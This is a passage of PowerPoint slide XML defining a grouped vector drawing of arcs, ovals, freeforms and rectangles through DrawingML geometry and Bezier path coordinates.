                        <a:pt x="5190" y="38091"/>
                        <a:pt x="0" y="30257"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66815" name="Arc 1279">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8564E43-2497-7A45-A0D3-31321152CA00}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1252" y="2048"/>
                  <a:ext cx="42" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21027 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38844 w 38844"/>
                    <a:gd name="T1" fmla="*/ 12212 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38844"/>
                    <a:gd name="T3" fmla="*/ 4941 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21027 w 38844"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38844" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38843" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34816" y="18087"/>
                        <a:pt x="28150" y="21600"/>
                        <a:pt x="21027" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11001" y="21600"/>
                        <a:pt x="2293" y="14701"/>
                        <a:pt x="-1" y="4941"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38844" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38843" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34816" y="18087"/>
                        <a:pt x="28150" y="21600"/>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6" name="Arc 1280">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53CA0F72-85E2-5A4B-B5B2-410590B943FE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1253" y="2048"/>
                  <a:ext cx="40" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20977 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38540 w 38540"/>
                    <a:gd name="T1" fmla="*/ 12574 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38540"/>
                    <a:gd name="T3" fmla="*/ 5149 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20977 w 38540"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38540" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38539" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34483" y="18239"/>
                        <a:pt x="27944" y="21600"/>
                        <a:pt x="20977" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11030" y="21600"/>
                        <a:pt x="2370" y="14808"/>
                        <a:pt x="-1" y="5149"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38540" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38539" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34483" y="18239"/>
                        <a:pt x="27944" y="21600"/>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817" name="Group 1281">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA081066-F774-C948-B968-BD247506D8DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1709" y="533"/>
              <a:ext cx="169" cy="168"/>
              <a:chOff x="961" y="2167"/>
              <a:chExt cx="169" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66818" name="Freeform 1282">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C471DB8F-EE8A-8048-BDFC-F4E261F35F7F}"/>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9" name="Freeform 1283">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B235092-B1EF-4F4E-A88F-3037901E0BDB}"/>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20" name="Rectangle 1284">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0953A0D7-2F45-034B-8281-44EE36DC8233}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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21" name="Rectangle 1285">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD329FEF-B4E2-974E-9D43-DAF4BD241C86}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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22" name="Freeform 1286">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B76CB4A-B5B3-DC45-95DB-FB7CEC3776A9}"/>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23" name="Freeform 1287">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66ED0EDF-704B-B64D-8435-92273E88D0C8}"/>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24" name="Freeform 1288">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3591CA9A-900D-4D43-B536-BC5FD4BD6A8B}"/>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25" name="Freeform 1289">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F87BA75-F2EF-6D43-8B42-86E73F621B2F}"/>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826" name="Freeform 1290">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A8BCED9-4406-814B-A330-FC45F4CDDF31}"/>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27" name="Freeform 1291">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E20927-392C-E443-8D4B-FBEFC05BF202}"/>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28" name="Rectangle 1292">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E647ED6A-0EFC-5E4F-B0A0-5BB589F4E01A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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29" name="Rectangle 1293">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3038D2DD-998D-574A-99A3-15C6E20C54E1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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830" name="Freeform 1294">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD125374-8E94-9046-869C-6EEB5F90BF20}"/>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31" name="Freeform 1295">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01FA843D-A19A-6D48-B5A3-1498EC45E9B3}"/>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32" name="Freeform 1296">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF2FDE26-1553-5844-B4DD-3DDA938CE98B}"/>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33" name="Freeform 1297">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3620F0E1-0E8E-714A-A9BD-41F51F4F4B84}"/>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34" name="Freeform 1298">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D29584B-62E2-DC40-A2BA-5DF4612B722B}"/>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35" name="Freeform 1299">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CD2BD35-B05F-E246-9AC9-F78A7B12D43E}"/>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36" name="Rectangle 1300">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB721A3E-AEA4-A74F-9BB8-CD62FF6147E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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37" name="Rectangle 1301">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70C6AB25-2045-BD4E-828D-58DDB5E46067}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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838" name="Group 1302">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E2E20D-6136-5B47-890E-96D4D7E541D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1753" y="571"/>
              <a:ext cx="93" cy="56"/>
              <a:chOff x="1005" y="2205"/>
              <a:chExt cx="93" cy="56"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66839" name="Group 1303">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D07B83-B129-A34B-9E95-8B8FC48FF615}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1005" y="2205"/>
                <a:ext cx="93" cy="56"/>
                <a:chOff x="1005" y="2205"/>
                <a:chExt cx="93" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66840" name="Oval 1304">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D52AB45-F415-1047-990D-9804AEE39852}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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1" name="Oval 1305">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464CA1FB-E1B9-A140-B688-B64D2EE83BBE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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2" name="Oval 1306">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4685F2B4-2798-3A4C-A96D-6D641EDCB642}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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3" name="Oval 1307">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22ABDB7-1F98-C24B-A7C3-5B4532AED6F5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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4" name="Oval 1308">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88F0FE9-1EAA-0F46-A7D3-501BC486ABD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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5" name="Oval 1309">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F5A4D28-1D1A-BA4F-876E-7C68E08ABD69}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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6" name="Oval 1310">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04699D8F-53D5-F94D-9132-AA67EBD1FE65}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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7" name="Oval 1311">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC3B3CA-7050-7B4B-A9A5-05CA3FDFC466}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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8" name="Oval 1312">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39347105-0025-0646-B6E4-A1B7690D6C68}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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849" name="Group 1313">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707A5EF8-7A34-AE46-B89F-B9A5459ECA47}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1005" y="2205"/>
                <a:ext cx="93" cy="56"/>
                <a:chOff x="1005" y="2205"/>
                <a:chExt cx="93" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66850" name="Arc 1314">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46A3FA0D-8116-914A-9568-3203FBD6FCB5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1039" y="2205"/>
                  <a:ext cx="38" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20350 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 40079"/>
                    <a:gd name="T1" fmla="*/ 14358 h 21600"/>
                    <a:gd name="T2" fmla="*/ 40079 w 40079"/>
                    <a:gd name="T3" fmla="*/ 12808 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20350 w 40079"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40079" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="14358"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3063" y="5749"/>
                        <a:pt x="11212" y="0"/>
                        <a:pt x="20350" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28878" y="0"/>
                        <a:pt x="36608" y="5017"/>
                        <a:pt x="40079" y="12807"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="40079" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="14358"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3063" y="5749"/>
                        <a:pt x="11212" y="0"/>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1" name="Arc 1315">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CFB25BB-6FB7-6640-9B9B-5CAEB4E3D8D1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1040" y="2206"/>
                  <a:ext cx="36" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20262 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 39867"/>
                    <a:gd name="T1" fmla="*/ 14117 h 21600"/>
                    <a:gd name="T2" fmla="*/ 39867 w 39867"/>
                    <a:gd name="T3" fmla="*/ 12534 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20262 w 39867"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="39867" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="14116"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3132" y="5633"/>
                        <a:pt x="11218" y="0"/>
                        <a:pt x="20262" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28681" y="0"/>
                        <a:pt x="36333" y="4892"/>
                        <a:pt x="39867" y="12533"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="39867" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="14116"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3132" y="5633"/>
                        <a:pt x="11218" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66852" name="Arc 1316">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642CF9A1-0411-2644-8B4E-A40D1F34EB32}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1015" y="2211"/>
                  <a:ext cx="23" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 447 w 31958"/>
                    <a:gd name="T1" fmla="*/ 25972 h 25972"/>
                    <a:gd name="T2" fmla="*/ 31958 w 31958"/>
                    <a:gd name="T3" fmla="*/ 2646 h 25972"/>
                    <a:gd name="T4" fmla="*/ 21600 w 31958"/>
                    <a:gd name="T5" fmla="*/ 21600 h 25972"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="31958" h="25972" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="447" y="25971"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="24533"/>
                        <a:pt x="0" y="23068"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25219" y="0"/>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0"/>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3" name="Arc 1317">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA58A01D-20B4-7846-91BE-F5BC76B7F36D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1016" y="2212"/>
                  <a:ext cx="21" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 465 w 31797"/>
                    <a:gd name="T1" fmla="*/ 26058 h 26058"/>
                    <a:gd name="T2" fmla="*/ 31797 w 31797"/>
                    <a:gd name="T3" fmla="*/ 2558 h 26058"/>
                    <a:gd name="T4" fmla="*/ 21600 w 31797"/>
                    <a:gd name="T5" fmla="*/ 21600 h 26058"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="31797" h="26058" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="465" y="26057"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="24592"/>
                        <a:pt x="0" y="23098"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25157" y="0"/>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0"/>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854" name="Arc 1318">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CCA02A-1D4E-A14A-9DD5-AAFE95054CCF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1011" y="2242"/>
                  <a:ext cx="24" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 1380 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 32394 w 32394"/>
                    <a:gd name="T1" fmla="*/ 20090 h 22980"/>
                    <a:gd name="T2" fmla="*/ 44 w 32394"/>
                    <a:gd name="T3" fmla="*/ 0 h 22980"/>
                    <a:gd name="T4" fmla="*/ 21600 w 32394"/>
                    <a:gd name="T5" fmla="*/ 1380 h 22980"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="32394" h="22980" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32393" y="20089"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="29111" y="21983"/>
                        <a:pt x="25389" y="22980"/>
                        <a:pt x="21600" y="22980"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="22980"/>
                        <a:pt x="0" y="13309"/>
                        <a:pt x="0" y="1380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="919"/>
                        <a:pt x="14" y="459"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="32394" h="22980" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32393" y="20089"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="29111" y="21983"/>
                        <a:pt x="25389" y="22980"/>
                        <a:pt x="21600" y="22980"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="22980"/>
                        <a:pt x="0" y="13309"/>
                        <a:pt x="0" y="1380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="919"/>
                        <a:pt x="14" y="459"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21600" y="13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5" name="Arc 1319">
                  <a:extLst>
